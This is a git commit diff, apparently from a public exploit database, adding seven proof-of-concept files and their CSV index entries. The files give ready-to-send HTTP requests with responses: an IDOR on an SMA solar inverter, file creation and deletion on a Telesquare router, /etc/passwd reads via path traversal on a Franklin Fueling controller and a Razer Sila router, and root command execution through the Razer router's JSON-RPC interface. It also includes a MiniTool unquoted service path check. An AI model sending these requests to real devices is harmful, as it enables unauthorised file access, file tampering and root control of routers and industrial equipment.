DB: 2022-04-12

7 changes to exploits/shellcodes MiniTool Partition Wizard - Unquoted Service Path Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI) SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR) Telesquare TLR-2855KS6 - Arbitrary File Creation Telesquare TLR-2855KS6 - Arbitrary File Deletion Razer Sila - Local File Inclusion (LFI) Razer Sila - Command Injection
2022-04-12 05:01:35 +00:00 · 2022-04-12 05:01:35 +00:00 · 6457d1796d
commit 6457d1796d
parent 50cc2edafe
8 changed files with 241 additions and 0 deletions
--- a/exploits/hardware/webapps/50860.txt
+++ b/exploits/hardware/webapps/50860.txt
@ -0,0 +1,35 @@
+# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)
+# Date: 7/4/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://www.sma.de
+# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R
+# Tested on: Linux [Firefox]
+# CVE : CVE-2021-46416
+
+# Proof of Concept
+
+============[ Normal user request ]============
+
+GET / HTTP/1.1
+Host: 192.168.1.4
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
+Upgrade-Insecure-Requests: 1
+
+============[ Manipulated username request ]============
+
+GET / HTTP/1.1
+Host: 192.168.1.4
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
+Upgrade-Insecure-Requests: 1
--- a/exploits/hardware/webapps/50862.txt
+++ b/exploits/hardware/webapps/50862.txt
@ -0,0 +1,22 @@
+# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation
+# Date: 7/4/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: http://www.telesquare.co.kr/
+# Version: TLR-2855KS6
+# Tested on: Linux [Firefox]
+# CVE : CVE-2021-46418
+
+# Proof of Concept
+
+PUT /cgi-bin/testing_cve.txt HTTP/1.1
+Host: 192.168.1.5
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: nonce=1642692359833588
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 32
--- a/exploits/hardware/webapps/50863.txt
+++ b/exploits/hardware/webapps/50863.txt
@ -0,0 +1,23 @@
+# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion
+# Date: 7/4/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: http://www.telesquare.co.kr/
+# Version: TLR-2855KS6
+# Tested on: Linux [Firefox]
+# CVE : CVE-2021-46419
+
+# Proof of Concept
+
+DELETE /cgi-bin/test.cgi HTTP/1.1
+Host: 192.168.1.5
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-type: application/x-www-form-urlencoded
+Content-Length: 438
+Origin: http://192.168.1.5
+DNT: 1
+Connection: close
+Referer: http://192.168.1.5/
+Cookie: nonce=16426923592222
--- a/exploits/hardware/webapps/50864.txt
+++ b/exploits/hardware/webapps/50864.txt
@ -0,0 +1,36 @@
+# Exploit Title: Razer Sila - Local File Inclusion (LFI)
+# Google Dork: N/A
+# Date: 4/9/2022
+# Exploit Author: Kevin Randall
+# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+# Version: RazerSila-2.0.441_api-2.0.418
+# Tested on: Razer Sila Router
+# CVE N/A
+
+# Proof of Concept
+
+# Request
+POST /ubus/ HTTP/1.1
+Host: 192.168.8.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 123
+Origin: https://192.168.8.1
+Referer: https://192.168.8.1/
+Te: trailers
+Connection: close
+
+{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}
+
+# Reponse
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: application/json
+Content-Length: 537
+
+{"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}
--- a/exploits/hardware/webapps/50865.txt
+++ b/exploits/hardware/webapps/50865.txt
@ -0,0 +1,61 @@
+# Exploit Title: Razer Sila - Command Injection
+# Google Dork: N/A
+# Date: 4/9/2022
+# Exploit Author: Kevin Randall
+# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+# Version: RazerSila-2.0.441_api-2.0.418
+# Tested on: Razer Sila Router
+# CVE N/A
+
+# Proof of Concept
+
+# Request
+POST /ubus/ HTTP/1.1
+Host: 192.168.8.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 117
+Origin: https://192.168.8.1
+Referer: https://192.168.8.1/
+Te: trailers
+Connection: close
+
+{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}
+
+# Response
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: application/json
+Content-Length: 85
+
+{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]}
+
+# Request
+POST /ubus/ HTTP/1.1
+Host: 192.168.8.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 117
+Origin: https://192.168.8.1
+Referer: https://192.168.8.1/
+Te: trailers
+Connection: close
+
+{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]}
+
+# Response
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: application/json
+Content-Length: 172
+
+{"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}
--- a/exploits/linux/remote/50861.txt
+++ b/exploits/linux/remote/50861.txt
@ -0,0 +1,26 @@
+# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
+# Date: 7/4/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://www.franklinfueling.com/
+# Version: 1.8.19.8580
+# Tested on: Linux [Firefox]
+# CVE : CVE-2021-46417
+
+# Proof of Concept
+
+============[ HTTP Exploitation ]============
+
+GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1
+Host: 192.168.1.6
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B
+Upgrade-Insecure-Requests: 1
+
+============[ URL Exploitation ]============
+
+http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
--- a/exploits/windows/local/50859.txt
+++ b/exploits/windows/local/50859.txt
@ -0,0 +1,31 @@
+# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path
+# Date: 07/04/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.minitool.com/
+# Software Link: https://www.minitool.com/download-center/
+# Version: 12.0
+# Tested: Windows 10 Pro x64 es
+
+# PoC :
+
+C:\Users\saudh>sc qc MTSchedulerService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: MTSchedulerService
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : MTSchedulerService
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe"
+
+C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F)
+                                                           BUILTIN\Administrators:(I)(F)
+                                                           BUILTIN\Users:(I)(RX)
+
+Successfully processed 1 files; Failed processing 0 files
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11476,6 +11476,7 @@ id,file,description,date,author,type,platform,port
 50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows,
 50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows,
 50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux,
+50859,exploits/windows/local/50859.txt,"MiniTool Partition Wizard - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18662,6 +18663,7 @@ id,file,description,date,author,type,platform,port
 50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware,
 50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware,
 50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple,
+50861,exploits/linux/remote/50861.txt,"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44926,3 +44928,8 @@ id,file,description,date,author,type,platform,port
 50853,exploits/php/webapps/50853.txt,"minewebcms 1.15.2 - Cross-site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php,
 50854,exploits/php/webapps/50854.txt,"qdPM 9.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Chetanya Sharma",webapps,php,
 50855,exploits/php/webapps/50855.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion",1970-01-01,"Devansh Bordia",webapps,php,
+50860,exploits/hardware/webapps/50860.txt,"SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)",1970-01-01,"Momen Eldawakhly",webapps,hardware,
+50862,exploits/hardware/webapps/50862.txt,"Telesquare TLR-2855KS6 - Arbitrary File Creation",1970-01-01,"Momen Eldawakhly",webapps,hardware,
+50863,exploits/hardware/webapps/50863.txt,"Telesquare TLR-2855KS6 - Arbitrary File Deletion",1970-01-01,"Momen Eldawakhly",webapps,hardware,
+50864,exploits/hardware/webapps/50864.txt,"Razer Sila - Local File Inclusion (LFI)",1970-01-01,"Kevin Randall",webapps,hardware,
+50865,exploits/hardware/webapps/50865.txt,"Razer Sila - Command Injection",1970-01-01,"Kevin Randall",webapps,hardware,